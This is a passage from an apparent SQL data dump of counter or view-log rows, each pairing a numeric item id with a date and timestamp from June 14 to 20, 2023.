06:42:24'),(78024,3285,1,'2023-06-14','2023-06-14 06:46:55'),(78025,3287,1,'2023-06-14','2023-06-14 06:47:05'),(78026,4741,1,'2023-06-14','2023-06-14 07:42:05'),(78027,4741,1,'2023-06-14','2023-06-14 07:45:26'),(78028,4762,1,'2023-06-14','2023-06-14 08:07:53'),(78029,4762,1,'2023-06-14','2023-06-14 08:07:55'),(78030,4966,1,'2023-06-14','2023-06-14 08:37:28'),(78031,5280,1,'2023-06-14','2023-06-14 08:45:49'),(78032,4744,1,'2023-06-14','2023-06-14 08:52:52'),(78033,4744,1,'2023-06-14','2023-06-14 08:52:54'),(78034,4765,1,'2023-06-14','2023-06-14 09:37:53'),(78035,5320,1,'2023-06-14','2023-06-14 09:45:44'),(78036,5122,1,'2023-06-14','2023-06-14 09:56:52'),(78037,4768,1,'2023-06-14','2023-06-14 10:15:16'),(78038,4771,1,'2023-06-14','2023-06-14 10:22:55'),(78039,4771,1,'2023-06-14','2023-06-14 10:24:32'),(78040,4874,1,'2023-06-14','2023-06-14 10:41:52'),(78041,3664,1,'2023-06-14','2023-06-14 10:51:37'),(78042,4765,1,'2023-06-14','2023-06-14 11:16:34'),(78043,4911,1,'2023-06-14','2023-06-14 11:39:22'),(78044,4654,1,'2023-06-14','2023-06-14 12:01:11'),(78045,4674,1,'2023-06-14','2023-06-14 12:21:12'),(78046,1718,1,'2023-06-14','2023-06-14 12:43:44'),(78047,4832,1,'2023-06-14','2023-06-14 13:06:12'),(78048,4911,1,'2023-06-14','2023-06-14 13:27:09'),(78049,4938,1,'2023-06-14','2023-06-14 13:35:41'),(78050,3781,1,'2023-06-14','2023-06-14 13:48:19'),(78051,3438,1,'2023-06-14','2023-06-14 13:57:54'),(78052,5146,1,'2023-06-14','2023-06-14 14:06:56'),(78053,1728,1,'2023-06-14','2023-06-14 14:09:16'),(78054,467,1,'2023-06-14','2023-06-14 14:25:41'),(78055,4911,1,'2023-06-14','2023-06-14 14:35:18'),(78056,2617,1,'2023-06-14','2023-06-14 14:50:57'),(78057,3691,1,'2023-06-14','2023-06-14 14:52:22'),(78058,4911,1,'2023-06-14','2023-06-14 15:24:42'),(78059,4911,1,'2023-06-14','2023-06-14 15:26:46'),(78060,3243,1,'2023-06-14','2023-06-14 15:38:49'),(78061,3117,1,'2023-06-14','2023-06-14 15:42:27'),(78062,4944,1,'2023-06-14','2023-06-14 15:45:22'),(78063,5163,1,'2023-06-14','2023-06-14 15:55:58'),(78064,5276,1,'2023-06-14','2023-06-14 15:56:02'),(78065,4756,1,'2023-06-14','2023-06-14 15:56:59'),(78066,80,1,'2023-06-14','2023-06-14 16:16:02'),(78067,473,1,'2023-06-14','2023-06-14 16:32:29'),(78068,487,1,'2023-06-14','2023-06-14 16:32:33'),(78069,3034,1,'2023-06-14','2023-06-14 16:57:08'),(78070,4911,1,'2023-06-14','2023-06-14 17:05:53'),(78071,5304,1,'2023-06-14','2023-06-14 17:27:50'),(78072,3781,1,'2023-06-14','2023-06-14 17:30:53'),(78073,5042,1,'2023-06-14','2023-06-14 17:36:06'),(78074,3090,1,'2023-06-14','2023-06-14 17:36:27'),(78075,3771,1,'2023-06-14','2023-06-14 17:40:56'),(78076,4911,1,'2023-06-14','2023-06-14 17:42:00'),(78077,4416,1,'2023-06-14','2023-06-14 17:48:36'),(78078,4911,1,'2023-06-14','2023-06-14 18:00:52'),(78079,4911,1,'2023-06-14','2023-06-14 18:02:04'),(78080,4332,1,'2023-06-14','2023-06-14 18:17:55'),(78081,4911,1,'2023-06-14','2023-06-14 18:26:31'),(78082,473,1,'2023-06-14','2023-06-14 18:35:03'),(78083,474,1,'2023-06-14','2023-06-14 18:35:03'),(78084,4911,1,'2023-06-14','2023-06-14 19:10:46'),(78085,1600,1,'2023-06-14','2023-06-14 19:33:39'),(78086,1608,1,'2023-06-14','2023-06-14 19:48:03'),(78087,2993,1,'2023-06-14','2023-06-14 19:48:29'),(78088,3243,1,'2023-06-14','2023-06-14 20:30:11'),(78089,80,1,'2023-06-14','2023-06-14 20:34:27'),(78090,3781,1,'2023-06-14','2023-06-14 20:35:12'),(78091,3764,1,'2023-06-14','2023-06-14 22:35:40'),(78092,4622,1,'2023-06-14','2023-06-14 22:47:06'),(78093,4911,1,'2023-06-14','2023-06-14 22:54:17'),(78094,1776,1,'2023-06-14','2023-06-14 22:54:22'),(78095,2956,1,'2023-06-14','2023-06-14 23:32:09'),(78096,1610,1,'2023-06-14','2023-06-14 23:37:02'),(78097,3102,1,'2023-06-15','2023-06-15 00:20:36'),(78098,3781,1,'2023-06-15','2023-06-15 02:04:02'),(78099,4660,1,'2023-06-15','2023-06-15 03:03:58'),(78100,4648,1,'2023-06-15','2023-06-15 03:09:25'),(78101,5062,1,'2023-06-15','2023-06-15 03:17:40'),(78102,4663,1,'2023-06-15','2023-06-15 03:20:24'),(78103,4377,1,'2023-06-15','2023-06-15 03:49:16'),(78104,91,1,'2023-06-15','2023-06-15 07:13:01'),(78105,5125,1,'2023-06-15','2023-06-15 08:02:58'),(78106,1586,1,'2023-06-15','2023-06-15 08:27:46'),(78107,4941,1,'2023-06-15','2023-06-15 08:38:36'),(78108,1582,1,'2023-06-15','2023-06-15 08:42:07'),(78109,1877,1,'2023-06-15','2023-06-15 08:51:03'),(78110,1588,1,'2023-06-15','2023-06-15 08:54:13'),(78111,1870,1,'2023-06-15','2023-06-15 08:55:30'),(78112,4685,1,'2023-06-15','2023-06-15 09:08:43'),(78113,1877,1,'2023-06-15','2023-06-15 09:09:10'),(78114,1877,1,'2023-06-15','2023-06-15 09:18:03'),(78115,5163,1,'2023-06-15','2023-06-15 09:24:52'),(78116,470,1,'2023-06-15','2023-06-15 09:35:58'),(78117,5163,1,'2023-06-15','2023-06-15 09:37:47'),(78118,5062,1,'2023-06-15','2023-06-15 09:45:22'),(78119,1728,1,'2023-06-15','2023-06-15 09:47:39'),(78120,1711,1,'2023-06-15','2023-06-15 09:51:59'),(78121,5280,1,'2023-06-15','2023-06-15 09:53:45'),(78122,1582,1,'2023-06-15','2023-06-15 10:46:10'),(78123,1588,1,'2023-06-15','2023-06-15 10:55:48'),(78124,470,1,'2023-06-15','2023-06-15 11:00:13'),(78125,91,1,'2023-06-15','2023-06-15 11:04:23'),(78126,469,1,'2023-06-15','2023-06-15 11:28:36'),(78127,4645,1,'2023-06-15','2023-06-15 11:35:01'),(78128,4645,1,'2023-06-15','2023-06-15 11:35:03'),(78129,470,1,'2023-06-15','2023-06-15 11:49:19'),(78130,4966,1,'2023-06-15','2023-06-15 11:50:22'),(78131,76,1,'2023-06-15','2023-06-15 11:50:25'),(78132,68,1,'2023-06-15','2023-06-15 11:54:33'),(78133,87,1,'2023-06-15','2023-06-15 11:54:55'),(78134,91,1,'2023-06-15','2023-06-15 11:55:23'),(78135,3079,1,'2023-06-15','2023-06-15 11:59:39'),(78136,91,1,'2023-06-15','2023-06-15 12:10:26'),(78137,5071,1,'2023-06-15','2023-06-15 12:33:18'),(78138,1598,1,'2023-06-15','2023-06-15 12:40:45'),(78139,4663,1,'2023-06-15','2023-06-15 12:49:03'),(78140,4663,1,'2023-06-15','2023-06-15 12:49:04'),(78141,4996,1,'2023-06-15','2023-06-15 13:11:32'),(78142,4996,1,'2023-06-15','2023-06-15 13:11:33'),(78143,4494,1,'2023-06-15','2023-06-15 13:32:54'),(78144,4911,1,'2023-06-15','2023-06-15 13:38:11'),(78145,2904,1,'2023-06-15','2023-06-15 13:39:03'),(78146,2904,1,'2023-06-15','2023-06-15 13:39:06'),(78147,2904,1,'2023-06-15','2023-06-15 13:40:38'),(78148,2904,1,'2023-06-15','2023-06-15 13:41:46'),(78149,4911,1,'2023-06-15','2023-06-15 13:41:52'),(78150,4582,1,'2023-06-15','2023-06-15 13:50:04'),(78151,4582,1,'2023-06-15','2023-06-15 13:51:07'),(78152,469,1,'2023-06-15','2023-06-15 14:14:10'),(78153,1602,1,'2023-06-15','2023-06-15 14:23:41'),(78154,1544,1,'2023-06-15','2023-06-15 14:24:57'),(78155,4651,1,'2023-06-15','2023-06-15 14:35:06'),(78156,4651,1,'2023-06-15','2023-06-15 14:35:07'),(78157,4494,1,'2023-06-15','2023-06-15 14:36:17'),(78158,5292,1,'2023-06-15','2023-06-15 14:42:39'),(78159,5020,1,'2023-06-15','2023-06-15 14:49:10'),(78160,1544,1,'2023-06-15','2023-06-15 15:01:58'),(78161,5280,1,'2023-06-15','2023-06-15 15:06:58'),(78162,470,1,'2023-06-15','2023-06-15 15:13:29'),(78163,91,1,'2023-06-15','2023-06-15 15:13:45'),(78164,4963,1,'2023-06-15','2023-06-15 15:14:58'),(78165,1602,1,'2023-06-15','2023-06-15 15:28:06'),(78166,4883,1,'2023-06-15','2023-06-15 15:43:16'),(78167,2154,1,'2023-06-15','2023-06-15 15:59:54'),(78168,1776,1,'2023-06-15','2023-06-15 16:10:33'),(78169,1776,1,'2023-06-15','2023-06-15 16:32:09'),(78170,3742,1,'2023-06-15','2023-06-15 17:06:30'),(78171,91,1,'2023-06-15','2023-06-15 18:40:44'),(78172,5062,1,'2023-06-15','2023-06-15 19:05:28'),(78173,1594,1,'2023-06-15','2023-06-15 20:14:48'),(78174,5248,1,'2023-06-15','2023-06-15 20:17:02'),(78175,5020,1,'2023-06-15','2023-06-15 20:40:37'),(78176,1703,1,'2023-06-15','2023-06-15 21:16:42'),(78177,487,1,'2023-06-15','2023-06-15 21:39:04'),(78178,4911,1,'2023-06-15','2023-06-15 22:36:54'),(78179,2419,1,'2023-06-16','2023-06-16 00:41:53'),(78180,68,1,'2023-06-16','2023-06-16 00:43:12'),(78181,4837,1,'2023-06-16','2023-06-16 01:49:07'),(78182,1703,1,'2023-06-16','2023-06-16 02:34:12'),(78183,1778,1,'2023-06-16','2023-06-16 02:41:31'),(78184,1594,1,'2023-06-16','2023-06-16 03:37:06'),(78185,5163,1,'2023-06-16','2023-06-16 05:09:53'),(78186,80,1,'2023-06-16','2023-06-16 05:09:58'),(78187,486,1,'2023-06-16','2023-06-16 05:11:18'),(78188,80,1,'2023-06-16','2023-06-16 05:11:32'),(78189,80,1,'2023-06-16','2023-06-16 05:11:52'),(78190,2410,1,'2023-06-16','2023-06-16 05:13:21'),(78191,2395,1,'2023-06-16','2023-06-16 05:13:37'),(78192,2410,1,'2023-06-16','2023-06-16 05:13:39'),(78193,2395,1,'2023-06-16','2023-06-16 05:13:40'),(78194,2410,1,'2023-06-16','2023-06-16 05:13:53'),(78195,2411,1,'2023-06-16','2023-06-16 05:13:59'),(78196,2419,1,'2023-06-16','2023-06-16 05:14:04'),(78197,4520,1,'2023-06-16','2023-06-16 06:19:28'),(78198,1588,1,'2023-06-16','2023-06-16 07:17:16'),(78199,4941,1,'2023-06-16','2023-06-16 08:00:38'),(78200,4911,1,'2023-06-16','2023-06-16 09:05:37'),(78201,2904,1,'2023-06-16','2023-06-16 09:06:04'),(78202,2904,1,'2023-06-16','2023-06-16 09:07:38'),(78203,2904,1,'2023-06-16','2023-06-16 09:08:22'),(78204,1598,1,'2023-06-16','2023-06-16 09:08:24'),(78205,4911,1,'2023-06-16','2023-06-16 09:08:52'),(78206,4382,1,'2023-06-16','2023-06-16 09:56:17'),(78207,89,1,'2023-06-16','2023-06-16 10:59:52'),(78208,84,1,'2023-06-16','2023-06-16 11:14:18'),(78209,4930,1,'2023-06-16','2023-06-16 11:14:34'),(78210,1588,1,'2023-06-16','2023-06-16 11:21:50'),(78211,91,1,'2023-06-16','2023-06-16 11:40:30'),(78212,1703,1,'2023-06-16','2023-06-16 11:44:22'),(78213,91,1,'2023-06-16','2023-06-16 11:44:34'),(78214,4542,1,'2023-06-16','2023-06-16 11:52:40'),(78215,1582,1,'2023-06-16','2023-06-16 12:08:52'),(78216,4938,1,'2023-06-16','2023-06-16 12:39:16'),(78217,4930,1,'2023-06-16','2023-06-16 12:40:01'),(78218,4966,1,'2023-06-16','2023-06-16 12:40:21'),(78219,4930,1,'2023-06-16','2023-06-16 12:40:42'),(78220,4950,1,'2023-06-16','2023-06-16 12:41:10'),(78221,5163,1,'2023-06-16','2023-06-16 12:41:27'),(78222,4930,1,'2023-06-16','2023-06-16 12:42:07'),(78223,4938,1,'2023-06-16','2023-06-16 12:42:09'),(78224,4930,1,'2023-06-16','2023-06-16 12:42:10'),(78225,4941,1,'2023-06-16','2023-06-16 12:42:26'),(78226,4930,1,'2023-06-16','2023-06-16 12:43:09'),(78227,4938,1,'2023-06-16','2023-06-16 12:43:10'),(78228,4888,1,'2023-06-16','2023-06-16 13:41:03'),(78229,3313,1,'2023-06-16','2023-06-16 13:44:31'),(78230,4785,1,'2023-06-16','2023-06-16 13:50:23'),(78231,76,1,'2023-06-16','2023-06-16 14:11:11'),(78232,1728,1,'2023-06-16','2023-06-16 14:19:38'),(78233,3005,1,'2023-06-16','2023-06-16 14:38:59'),(78234,473,1,'2023-06-16','2023-06-16 15:04:43'),(78235,487,1,'2023-06-16','2023-06-16 15:04:43'),(78236,2617,1,'2023-06-16','2023-06-16 15:04:44'),(78237,4888,1,'2023-06-16','2023-06-16 15:43:18'),(78238,570,1,'2023-06-16','2023-06-16 15:49:14'),(78239,2165,1,'2023-06-16','2023-06-16 15:55:48'),(78240,4911,1,'2023-06-16','2023-06-16 15:59:47'),(78241,80,1,'2023-06-16','2023-06-16 16:00:14'),(78242,80,1,'2023-06-16','2023-06-16 16:03:55'),(78243,74,1,'2023-06-16','2023-06-16 16:05:07'),(78244,4542,1,'2023-06-16','2023-06-16 17:33:23'),(78245,4911,1,'2023-06-16','2023-06-16 18:52:40'),(78246,4753,1,'2023-06-16','2023-06-16 20:37:15'),(78247,4703,1,'2023-06-16','2023-06-16 20:44:37'),(78248,487,1,'2023-06-16','2023-06-16 20:51:11'),(78249,4911,1,'2023-06-16','2023-06-16 21:20:21'),(78250,4776,1,'2023-06-16','2023-06-16 21:25:13'),(78251,1544,1,'2023-06-16','2023-06-16 21:35:09'),(78252,1544,1,'2023-06-16','2023-06-16 21:43:32'),(78253,1544,1,'2023-06-16','2023-06-16 22:15:55'),(78254,2154,1,'2023-06-16','2023-06-16 22:18:34'),(78255,3781,1,'2023-06-16','2023-06-16 23:27:22'),(78256,5146,1,'2023-06-17','2023-06-17 00:08:27'),(78257,3083,1,'2023-06-17','2023-06-17 01:31:04'),(78258,3531,1,'2023-06-17','2023-06-17 01:55:48'),(78259,2165,1,'2023-06-17','2023-06-17 01:56:21'),(78260,5304,1,'2023-06-17','2023-06-17 01:57:28'),(78261,4657,1,'2023-06-17','2023-06-17 02:03:49'),(78262,4768,1,'2023-06-17','2023-06-17 02:09:53'),(78263,3005,1,'2023-06-17','2023-06-17 02:12:33'),(78264,3307,1,'2023-06-17','2023-06-17 02:14:16'),(78265,3781,1,'2023-06-17','2023-06-17 02:20:42'),(78266,3781,1,'2023-06-17','2023-06-17 02:28:53'),(78267,4983,1,'2023-06-17','2023-06-17 02:38:15'),(78268,3090,1,'2023-06-17','2023-06-17 02:39:07'),(78269,4335,1,'2023-06-17','2023-06-17 02:48:19'),(78270,2152,1,'2023-06-17','2023-06-17 02:53:24'),(78271,476,1,'2023-06-17','2023-06-17 03:04:23'),(78272,2152,1,'2023-06-17','2023-06-17 03:23:22'),(78273,5280,1,'2023-06-17','2023-06-17 03:25:39'),(78274,476,1,'2023-06-17','2023-06-17 03:38:08'),(78275,1596,1,'2023-06-17','2023-06-17 03:41:07'),(78276,4700,1,'2023-06-17','2023-06-17 03:42:40'),(78277,5163,1,'2023-06-17','2023-06-17 04:00:54'),(78278,1596,1,'2023-06-17','2023-06-17 04:08:34'),(78279,4768,1,'2023-06-17','2023-06-17 04:10:47'),(78280,91,1,'2023-06-17','2023-06-17 04:18:01'),(78281,5320,1,'2023-06-17','2023-06-17 05:38:42'),(78282,3307,1,'2023-06-17','2023-06-17 05:59:08'),(78283,3531,1,'2023-06-17','2023-06-17 06:36:32'),(78284,4648,1,'2023-06-17','2023-06-17 06:57:04'),(78285,2150,1,'2023-06-17','2023-06-17 07:18:15'),(78286,3764,1,'2023-06-17','2023-06-17 07:36:16'),(78287,3090,1,'2023-06-17','2023-06-17 08:09:04'),(78288,3664,1,'2023-06-17','2023-06-17 10:45:11'),(78289,5320,1,'2023-06-17','2023-06-17 10:45:51'),(78290,3005,1,'2023-06-17','2023-06-17 11:08:22'),(78291,5122,1,'2023-06-17','2023-06-17 11:27:39'),(78292,4911,1,'2023-06-17','2023-06-17 11:28:39'),(78293,5334,1,'2023-06-17','2023-06-17 11:50:16'),(78294,3226,1,'2023-06-17','2023-06-17 11:57:47'),(78295,5163,1,'2023-06-17','2023-06-17 12:01:16'),(78296,5276,1,'2023-06-17','2023-06-17 12:01:25'),(78297,4911,1,'2023-06-17','2023-06-17 12:48:58'),(78298,4874,1,'2023-06-17','2023-06-17 13:45:06'),(78299,4485,1,'2023-06-17','2023-06-17 13:45:12'),(78300,3781,1,'2023-06-17','2023-06-17 13:47:05'),(78301,5334,1,'2023-06-17','2023-06-17 16:02:10'),(78302,4436,1,'2023-06-17','2023-06-17 16:11:07'),(78303,4870,1,'2023-06-17','2023-06-17 17:23:41'),(78304,2904,1,'2023-06-17','2023-06-17 17:36:02'),(78305,473,1,'2023-06-17','2023-06-17 17:57:50'),(78306,473,1,'2023-06-17','2023-06-17 17:58:39'),(78307,5353,1,'2023-06-17','2023-06-17 18:29:53'),(78308,5353,1,'2023-06-17','2023-06-17 18:31:25'),(78309,1584,1,'2023-06-17','2023-06-17 19:39:49'),(78310,89,1,'2023-06-17','2023-06-17 19:50:37'),(78311,4977,1,'2023-06-17','2023-06-17 20:29:09'),(78312,4966,1,'2023-06-17','2023-06-17 21:25:34'),(78313,5256,1,'2023-06-17','2023-06-17 21:54:35'),(78314,4960,1,'2023-06-17','2023-06-17 22:31:19'),(78315,4960,1,'2023-06-17','2023-06-17 22:55:50'),(78316,3781,1,'2023-06-17','2023-06-17 22:57:32'),(78317,3721,1,'2023-06-17','2023-06-17 23:48:28'),(78318,4785,1,'2023-06-17','2023-06-17 23:48:35'),(78319,4941,1,'2023-06-17','2023-06-17 23:51:25'),(78320,4654,1,'2023-06-18','2023-06-18 00:15:48'),(78321,4357,1,'2023-06-18','2023-06-18 00:20:31'),(78322,4977,1,'2023-06-18','2023-06-18 01:51:52'),(78323,4960,1,'2023-06-18','2023-06-18 01:53:26'),(78324,3181,1,'2023-06-18','2023-06-18 01:53:38'),(78325,5276,1,'2023-06-18','2023-06-18 02:04:25'),(78326,4911,1,'2023-06-18','2023-06-18 02:16:58'),(78327,4654,1,'2023-06-18','2023-06-18 02:42:24'),(78328,4654,1,'2023-06-18','2023-06-18 02:42:26'),(78329,4960,1,'2023-06-18','2023-06-18 03:11:53'),(78330,1739,1,'2023-06-18','2023-06-18 03:30:57'),(78331,2751,1,'2023-06-18','2023-06-18 03:38:53'),(78332,3181,1,'2023-06-18','2023-06-18 04:32:47'),(78333,4551,1,'2023-06-18','2023-06-18 04:47:35'),(78334,5037,1,'2023-06-18','2023-06-18 05:01:05'),(78335,4747,1,'2023-06-18','2023-06-18 05:20:45'),(78336,2751,1,'2023-06-18','2023-06-18 05:36:26'),(78337,3229,1,'2023-06-18','2023-06-18 05:52:56'),(78338,4911,1,'2023-06-18','2023-06-18 06:59:27'),(78339,4911,1,'2023-06-18','2023-06-18 06:59:46'),(78340,4911,1,'2023-06-18','2023-06-18 07:00:16'),(78341,2309,1,'2023-06-18','2023-06-18 07:07:28'),(78342,3777,1,'2023-06-18','2023-06-18 07:50:21'),(78343,1711,1,'2023-06-18','2023-06-18 08:01:46'),(78344,3102,1,'2023-06-18','2023-06-18 08:50:41'),(78345,4759,1,'2023-06-18','2023-06-18 08:54:33'),(78346,91,1,'2023-06-18','2023-06-18 09:27:28'),(78347,1604,1,'2023-06-18','2023-06-18 09:57:30'),(78348,1745,1,'2023-06-18','2023-06-18 10:24:32'),(78349,4420,1,'2023-06-18','2023-06-18 10:53:24'),(78350,4440,1,'2023-06-18','2023-06-18 11:31:17'),(78351,4301,1,'2023-06-18','2023-06-18 11:59:46'),(78352,4301,1,'2023-06-18','2023-06-18 12:22:35'),(78353,1594,1,'2023-06-18','2023-06-18 12:52:27'),(78354,4485,1,'2023-06-18','2023-06-18 12:57:28'),(78355,3691,1,'2023-06-18','2023-06-18 14:09:34'),(78356,3267,1,'2023-06-18','2023-06-18 14:13:37'),(78357,3764,1,'2023-06-18','2023-06-18 14:41:10'),(78358,4412,1,'2023-06-18','2023-06-18 15:08:13'),(78359,3030,1,'2023-06-18','2023-06-18 15:21:22'),(78360,470,1,'2023-06-18','2023-06-18 15:30:08'),(78361,2965,1,'2023-06-18','2023-06-18 15:34:36'),(78362,4893,1,'2023-06-18','2023-06-18 15:44:03'),(78363,2993,1,'2023-06-18','2023-06-18 15:56:34'),(78364,4323,1,'2023-06-18','2023-06-18 16:01:02'),(78365,1604,1,'2023-06-18','2023-06-18 16:18:14'),(78366,1582,1,'2023-06-18','2023-06-18 16:36:02'),(78367,4323,1,'2023-06-18','2023-06-18 16:43:44'),(78368,4420,1,'2023-06-18','2023-06-18 16:44:27'),(78369,1766,1,'2023-06-18','2023-06-18 16:53:14'),(78370,3691,1,'2023-06-18','2023-06-18 17:03:09'),(78371,470,1,'2023-06-18','2023-06-18 17:10:51'),(78372,2965,1,'2023-06-18','2023-06-18 17:20:52'),(78373,4874,1,'2023-06-18','2023-06-18 17:39:38'),(78374,4654,1,'2023-06-18','2023-06-18 17:40:04'),(78375,2609,1,'2023-06-18','2023-06-18 17:48:34'),(78376,4412,1,'2023-06-18','2023-06-18 17:56:23'),(78377,4323,1,'2023-06-18','2023-06-18 17:58:32'),(78378,4335,1,'2023-06-18','2023-06-18 17:58:59'),(78379,4657,1,'2023-06-18','2023-06-18 18:36:45'),(78380,1608,1,'2023-06-18','2023-06-18 18:39:45'),(78381,4556,1,'2023-06-18','2023-06-18 18:40:47'),(78382,1610,1,'2023-06-18','2023-06-18 19:49:31'),(78383,80,1,'2023-06-18','2023-06-18 20:22:22'),(78384,68,1,'2023-06-18','2023-06-18 20:22:27'),(78385,108,1,'2023-06-18','2023-06-18 20:22:31'),(78386,4768,1,'2023-06-18','2023-06-18 22:17:57'),(78387,1594,1,'2023-06-18','2023-06-18 22:23:40'),(78388,5062,1,'2023-06-18','2023-06-18 22:53:40'),(78389,4911,1,'2023-06-18','2023-06-18 22:57:01'),(78390,4420,1,'2023-06-19','2023-06-19 00:44:06'),(78391,4897,1,'2023-06-19','2023-06-19 01:40:18'),(78392,1582,1,'2023-06-19','2023-06-19 02:31:59'),(78393,4960,1,'2023-06-19','2023-06-19 02:33:48'),(78394,472,1,'2023-06-19','2023-06-19 03:39:48'),(78395,2769,1,'2023-06-19','2023-06-19 04:52:02'),(78396,472,1,'2023-06-19','2023-06-19 05:15:40'),(78397,5314,1,'2023-06-19','2023-06-19 05:39:41'),(78398,4762,1,'2023-06-19','2023-06-19 05:46:11'),(78399,1594,1,'2023-06-19','2023-06-19 06:48:29'),(78400,2751,1,'2023-06-19','2023-06-19 07:09:28'),(78401,5062,1,'2023-06-19','2023-06-19 07:20:18'),(78402,1586,1,'2023-06-19','2023-06-19 07:53:37'),(78403,4529,1,'2023-06-19','2023-06-19 08:06:40'),(78404,4391,1,'2023-06-19','2023-06-19 08:19:49'),(78405,2804,1,'2023-06-19','2023-06-19 08:33:10'),(78406,80,1,'2023-06-19','2023-06-19 09:33:08'),(78407,2411,1,'2023-06-19','2023-06-19 09:33:19'),(78408,1584,1,'2023-06-19','2023-06-19 09:43:07'),(78409,4520,1,'2023-06-19','2023-06-19 10:08:53'),(78410,4980,1,'2023-06-19','2023-06-19 10:18:10'),(78411,91,1,'2023-06-19','2023-06-19 10:20:17'),(78412,4897,1,'2023-06-19','2023-06-19 10:43:37'),(78413,4911,1,'2023-06-19','2023-06-19 10:53:08'),(78414,4911,1,'2023-06-19','2023-06-19 11:16:36'),(78415,487,1,'2023-06-19','2023-06-19 11:21:02'),(78416,473,1,'2023-06-19','2023-06-19 11:21:02'),(78417,4911,1,'2023-06-19','2023-06-19 11:21:46'),(78418,4524,1,'2023-06-19','2023-06-19 11:44:15'),(78419,3764,1,'2023-06-19','2023-06-19 11:44:16'),(78420,4776,1,'2023-06-19','2023-06-19 11:44:16'),(78421,4529,1,'2023-06-19','2023-06-19 11:44:18'),(78422,5268,1,'2023-06-19','2023-06-19 11:44:20'),(78423,3251,1,'2023-06-19','2023-06-19 11:47:55'),(78424,5356,1,'2023-06-19','2023-06-19 12:20:54'),(78425,3251,1,'2023-06-19','2023-06-19 12:49:10'),(78426,1594,1,'2023-06-19','2023-06-19 12:49:24'),(78427,5001,1,'2023-06-19','2023-06-19 13:23:37'),(78428,4845,1,'2023-06-19','2023-06-19 14:00:22'),(78429,2297,1,'2023-06-19','2023-06-19 14:41:34'),(78430,5280,1,'2023-06-19','2023-06-19 14:59:28'),(78431,2775,1,'2023-06-19','2023-06-19 15:04:55'),(78432,4980,1,'2023-06-19','2023-06-19 15:32:28'),(78433,4944,1,'2023-06-19','2023-06-19 15:32:58'),(78434,2904,1,'2023-06-19','2023-06-19 15:33:37'),(78435,335,1,'2023-06-19','2023-06-19 15:34:14'),(78436,5307,1,'2023-06-19','2023-06-19 15:49:40'),(78437,4845,1,'2023-06-19','2023-06-19 15:49:45'),(78438,1588,1,'2023-06-19','2023-06-19 16:02:36'),(78439,80,1,'2023-06-19','2023-06-19 16:03:32'),(78440,1588,1,'2023-06-19','2023-06-19 16:04:18'),(78441,2804,1,'2023-06-19','2023-06-19 16:04:54'),(78442,4911,1,'2023-06-19','2023-06-19 16:09:41'),(78443,4485,1,'2023-06-19','2023-06-19 16:34:41'),(78444,484,1,'2023-06-19','2023-06-19 16:34:47'),(78445,68,1,'2023-06-19','2023-06-19 16:47:09'),(78446,91,1,'2023-06-19','2023-06-19 16:48:17'),(78447,4608,1,'2023-06-19','2023-06-19 16:49:02'),(78448,4524,1,'2023-06-19','2023-06-19 16:58:51'),(78449,473,1,'2023-06-19','2023-06-19 17:01:34'),(78450,474,1,'2023-06-19','2023-06-19 17:01:35'),(78451,5253,1,'2023-06-19','2023-06-19 17:02:57'),(78452,2178,1,'2023-06-19','2023-06-19 17:18:11'),(78453,4938,1,'2023-06-19','2023-06-19 17:24:35'),(78454,4944,1,'2023-06-19','2023-06-19 17:25:43'),(78455,5253,1,'2023-06-19','2023-06-19 17:47:57'),(78456,5280,1,'2023-06-19','2023-06-19 17:48:03'),(78457,4485,1,'2023-06-19','2023-06-19 18:04:40'),(78458,3297,1,'2023-06-19','2023-06-19 18:10:28'),(78459,1582,1,'2023-06-19','2023-06-19 18:10:29'),(78460,1582,1,'2023-06-19','2023-06-19 18:28:56'),(78461,4412,1,'2023-06-19','2023-06-19 18:32:54'),(78462,1610,1,'2023-06-19','2023-06-19 19:01:09'),(78463,91,1,'2023-06-19','2023-06-19 19:27:18'),(78464,1610,1,'2023-06-19','2023-06-19 19:45:50'),(78465,3102,1,'2023-06-19','2023-06-19 21:23:32'),(78466,2904,1,'2023-06-19','2023-06-19 21:28:52'),(78467,467,1,'2023-06-19','2023-06-19 22:33:24'),(78468,1586,1,'2023-06-19','2023-06-19 23:01:06'),(78469,3038,1,'2023-06-19','2023-06-19 23:47:22'),(78470,4301,1,'2023-06-20','2023-06-20 01:24:41'),(78471,4911,1,'2023-06-20','2023-06-20 01:49:49'),(78472,80,1,'2023-06-20','2023-06-20 01:51:46'),(78473,4911,1,'2023-06-20','2023-06-20 01:51:49'),(78474,3083,1,'2023-06-20','2023-06-20 01:54:15'),(78475,5271,1,'2023-06-20','2023-06-20 02:04:53'),(78476,4966,1,'2023-06-20','2023-06-20 02:24:50'),(78477,3083,1,'2023-06-20','2023-06-20 02:38:40'),(78478,5353,1,'2023-06-20','2023-06-20 02:53:33'),(78479,3083,1,'2023-06-20','2023-06-20 03:22:08'),(78480,3083,1,'2023-06-20','2023-06-20 03:23:00'),(78481,5307,1,'2023-06-20','2023-06-20 03:23:37'),(78482,1594,1,'2023-06-20','2023-06-20 04:22:18'),(78483,1594,1,'2023-06-20','2023-06-20 04:22:23'),(78484,1594,1,'2023-06-20','2023-06-20 04:22:25'),(78485,5359,1,'2023-06-20','2023-06-20 04:40:03'),(78486,3027,1,'2023-06-20','2023-06-20 04:44:39'),(78487,5356,1,'2023-06-20','2023-06-20 05:40:09'),(78488,1614,1,'2023-06-20','2023-06-20 06:01:56'),(78489,4508,1,'2023-06-20','2023-06-20 07:05:28'),(78490,3072,1,'2023-06-20','2023-06-20 07:45:03'),(78491,4960,1,'2023-06-20','2023-06-20 08:22:41'),(78492,5276,1,'2023-06-20','2023-06-20 08:29:40'),(78493,5276,1,'2023-06-20','2023-06-20 08:29:42'),(78494,4938,1,'2023-06-20','2023-06-20 08:49:12'),(78495,5256,1,'2023-06-20','2023-06-20 08:54:54'),(78496,4657,1,'2023-06-20','2023-06-20 09:25:08'),(78497,4657,1,'2023-06-20','2023-06-20 09:25:09'),(78498,4520,1,'2023-06-20','2023-06-20 10:19:10'),(78499,4660,1,'2023-06-20','2023-06-20 10:25:41'),(78500,4660,1,'2023-06-20','2023-06-20 10:25:43'),(78501,1594,1,'2023-06-20','2023-06-20 10:44:02'),(78502,4448,1,'2023-06-20','2023-06-20 10:47:22'),(78503,4700,1,'2023-06-20','2023-06-20 11:33:31'),(78504,4404,1,'2023-06-20','2023-06-20 11:35:59'),(78505,2309,1,'2023-06-20','2023-06-20 11:40:14'),(78506,91,1,'2023-06-20','2023-06-20 12:01:42'),(78507,5163,1,'2023-06-20','2023-06-20 12:22:52'),(78508,1602,1,'2023-06-20','2023-06-20 12:23:31'),(78509,2159,1,'2023-06-20','2023-06-20 